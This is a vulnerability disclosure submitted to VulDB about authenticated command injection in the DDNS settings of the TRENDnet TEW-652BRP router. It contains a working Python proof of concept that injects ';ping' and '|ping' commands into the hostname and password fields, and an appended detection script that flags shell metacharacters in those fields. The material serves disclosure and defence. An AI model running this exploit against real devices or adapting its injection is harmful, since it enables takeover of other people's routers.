Submit #77380: Command injection on TRENDnet router TEW-652BRP(2) Info

Title: Command injection on TRENDnet router TEW-652BRP(2)
Description:

# Command injection on TRENDnet router TEW-652BRP(2)

## Overview

* Type: command injection
* Supplier: TRENDNet (https://www.trendnet.com/)
* Product: TRENDNet TEW-652BRP (Version v3.2R, https://www.trendnet.com/support/support-detail.asp?prod=235_TEW-652BRP)
* Firmware download: https://downloads.trendnet.com/tew-652brp_v3.2/firmware/fw_tew-652brp_v3(3.04b01).zip
* Affected version: latest version 3.04B01
* Bug URL: http://192.168.10.1/get_set.ccp

## Description

A command injection (CI) vulnerability in the router allows a malicious attacker authenticated on the web interface to execute any command on the device remotely by crafting a request, enabling the attacker to gain the highest privilege on the system and take over the device. The device uses a plaintext password to log in to the web interface, so it is easy to leak passwords from the HTTP flow. This vulnerability can be exploited easily.

## Reproduce and PoC

### Steps to Reproduce

I have put the PoC code in the next section. After configuring several parameters and executing it, the router will send a ping echo to the local host. The parameters are as below:

- device_web_ip: web IP address of the target device.
- username, password: used to visit the web management interface.
- ping_target_ip: local host to which the router sends the ping echo.

You can open Wireshark to monitor the ICMP flow. After executing the PoC, you will see a ping echo from the device to the local host.

### Proof of Concept

Below is the PoC written in Python 3. Save the code into a script (exp.py) and execute it.
```
import requests,socket
import re
import time
from urllib.parse import urlencode

username = 'admin'
password = 'admin'
device_web_ip = '192.168.10.1'
ping_target_ip = '192.168.10.2'

headers = {'Host': '{}'.format(device_web_ip),
           'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',
           'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
           'Accept-Language': 'en-US,en;q=0.5',
           'Accept-Encoding': 'gzip, deflate',
           'Content-Type': 'application/x-www-form-urlencoded',
           'Origin': 'http://{}'.format(device_web_ip),
           'Connection': 'keep-alive',
           'Referer': 'http://{}/ping_test.htm'.format(device_web_ip),
           'Upgrade-Insecure-Requests': '1'}

login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password)
login_url = 'http://{}/login.ccp'.format(device_web_ip)
r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2)
if r is None or r.status_code != 200:
    print('Login wrong, please retry!')
    exit()

params = {
    'ccp_act': 'set',
    'ccpSubEvent': 'CCP_SUB_DDNS',
    'nextPage': 'ddns.htm',
    'ddnsCfg_DDNSEnable_1.1.0.0.0': 1,
    'ddnsCfg_DDNSServer_1.1.0.0.0': 'dynupdate.no-ip.com',
    'ddnsCfg_HostName_1.1.0.0.0': ';ping -c 1 {};'.format(ping_target_ip),
    'ddnsCfg_Username_1.1.0.0.0': 'admin',
    'ddnsCfg_Password_1.1.0.0.0': '|ping -c 1 {}'.format(ping_target_ip),
    'ddnsCfg_Timeout_1.1.0.0.0': ''
}
method = 'POST'
url = 'http://{}/get_set.ccp'.format(device_web_ip)
try:
    r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2)
except Exception as e:
    pass
```
User: leetsun (ID 39457)
Submission: 2023-01-26 12:10 (1 Year ago)
Moderation: 2023-02-01 14:23 (6 days later)
Status: Accepted
VulDB Entry: 219935
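A detection check for the request described in the submission, as an added example that is not part of the original report or any vendor code: it parses form-encoded POST bodies sent to `/get_set.ccp` and flags `ddnsCfg_*` values that contain shell metacharacters or, for the host name field, are not valid hostnames. The function name, the regular expressions and the sample requests are assumptions constructed for illustration; the report does not say which field reaches a shell, so every `ddnsCfg_*` field is checked.

```python
import re
from urllib.parse import parse_qsl, urlencode

TARGET_PATH = "/get_set.ccp"   # endpoint named in the report
FIELD_PREFIX = "ddnsCfg_"      # DDNS settings fields used in the report
# Shell separators, pipes, substitution and redirection characters.
SHELL_META = re.compile(r"[;|&`$<>(){}\\\r\n]")
# Hostname allowlist: dot-separated labels of letters, digits and hyphens.
HOSTNAME = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")


def inspect_request(method, path, body):
    """Return a list of (field, reason) findings for one HTTP request."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return []
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        if not field.startswith(FIELD_PREFIX):
            continue
        if SHELL_META.search(value):
            findings.append((field, "shell metacharacter"))
        elif "HostName" in field and value and not HOSTNAME.match(value):
            findings.append((field, "not a valid hostname"))
    return findings


# Constructed sample request bodies (not captured traffic).
BENIGN = urlencode({
    "ccp_act": "set", "ccpSubEvent": "CCP_SUB_DDNS",
    "ddnsCfg_HostName_1.1.0.0.0": "home.example.net",
    "ddnsCfg_Username_1.1.0.0.0": "admin",
    "ddnsCfg_Password_1.1.0.0.0": "correct-horse",
})
# Same shape as the request in the report, with its field values.
SUSPICIOUS = urlencode({
    "ccp_act": "set", "ccpSubEvent": "CCP_SUB_DDNS",
    "ddnsCfg_HostName_1.1.0.0.0": ";ping -c 1 192.168.10.2;",
    "ddnsCfg_Username_1.1.0.0.0": "admin",
    "ddnsCfg_Password_1.1.0.0.0": "|ping -c 1 192.168.10.2",
})

if __name__ == "__main__":
    for name, body in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(name, inspect_request("POST", TARGET_PATH, body))
```

A legitimate DDNS password can contain some of these characters, so a hit on the password field is a signal to review rather than proof of an attempt.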
